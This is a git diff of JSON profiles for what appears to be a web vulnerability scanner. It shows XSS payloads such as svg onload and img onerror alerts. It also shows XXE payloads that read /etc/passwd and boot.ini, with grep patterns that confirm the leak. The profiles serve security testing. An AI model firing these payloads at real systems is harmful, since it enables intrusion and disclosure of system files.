--- a/profiles/XSSUrlEncode.bb
+++ b/profiles/XSSUrlEncode.bb
@@ -1 +1,106 @@
-[{"Name":"XSSUrlEncode","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e","\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.","\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e","\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e","\u003csvg/oNLoAd\u003dalert(1)\u003e","\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--","\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e","javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e","\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e"],"Encoder":["URL-encode key characters"],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["XSS","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/plain,text/fragment+html,application/json","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":4,"RedirType":4,"MaxRedir":4,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XSSUrlEncode","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"XSS with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "XSSUrlEncode",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e",
+ "true,\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.",
+ "true,\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e",
+ "true,\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e",
+ "true,\u003csvg/oNLoAd\u003dalert(1)\u003e",
+ "true,\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--",
+ "true,\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e",
+ "true,javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e",
+ "true,\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e"
+ ],
+ "Encoder": [
+ "URL-encode key characters"
+ ],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [],
+ "Tags": [
+ "XSS",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": true,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/plain,text/fragment+html,application/json",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 4,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 4,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "XSSUrlEncode",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "XSS with payloads: \u003cbr\u003e \u003cpayload\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/XXE.bb b/profiles/XXE.bb
index 9b843b3..6dd17d1 100755
--- a/profiles/XXE.bb
+++ b/profiles/XXE.bb
@@ -1 +1,103 @@
-[{"Name":"XXE","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e","\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file://c:/boot.ini\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e","\u003c!DOCTYPE foo [ \u003c!ENTITY % xxe SYSTEM \"data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk\"\u003e]\u003e\u003cfoo/\u003e","\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource\u003d/etc/passwd\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,root:x","true,Or,boot loader","true,Or,cm9vdD"],"Tags":["XXE","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XXE","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"XXE found with: \u003cbr\u003e \u003cpayload\u003e ","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "XXE",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e",
+ "true,\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file://c:/boot.ini\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e",
+ "true,\u003c!DOCTYPE foo [ \u003c!ENTITY % xxe SYSTEM \"data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk\"\u003e]\u003e\u003cfoo/\u003e",
+ "true,\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource\u003d/etc/passwd\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,root:x",
+ "true,Or,boot loader",
+ "true,Or,cm9vdD"
+ ],
+ "Tags": [
+ "XXE",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "XXE",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "XXE found with: \u003cbr\u003e \u003cpayload\u003e ",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Youtube_Channel_ID.bb b/profiles/Youtube_Channel_ID.bb
old mode 100644
new mode 100755
index 200b570..3845bdc
--- a/profiles/Youtube_Channel_ID.bb
+++ b/profiles/Youtube_Channel_ID.bb
@@ -1 +1,59 @@
-[{"Name":"Youtube_Channel_ID","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,https?:\\/\\/(www\\.)?youtube.com\\/channel\\/UC([-_a-z0-9]{22})"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Youtube Channel ID","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Youtube_Channel_ID",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,https?:\\/\\/(www\\.)?youtube.com\\/channel\\/UC([-_a-z0-9]{22})"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Youtube Channel ID",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/tags.txt b/profiles/tags.txt
old mode 100644
new mode 100755
index 3da46ef..16ec8a9
--- a/profiles/tags.txt
+++ b/profiles/tags.txt
@@ -1,22 +1,22 @@
-Collaborator
-PathTraversal
-RCE
-SQLi
-CookieAttributes
-SecurityHeaders
-XSS
-JWT
-CMS
-CVE
-Errors
-InformationDisclosure
-API
-SQLi
-XXE
-endpoints
-regex
-Variations
-Graphql
-Cloud
-All
-Mobile
+Collaborator
+PathTraversal
+RCE
+SQLi
+CookieAttributes
+SecurityHeaders
+XSS
+JWT
+CMS
+CVE
+Errors
+InformationDisclosure
+API
+SQLi
+XXE
+endpoints
+regex
+Variations
+Graphql
+Cloud
+All
+Mobile
diff --git a/src/ActiveProfile.form b/src/ActiveProfile.form
index 6f2c7ac..be2b1d7 100755
--- a/src/ActiveProfile.form
+++ b/src/ActiveProfile.form
@@ -3,21 +3,39 @@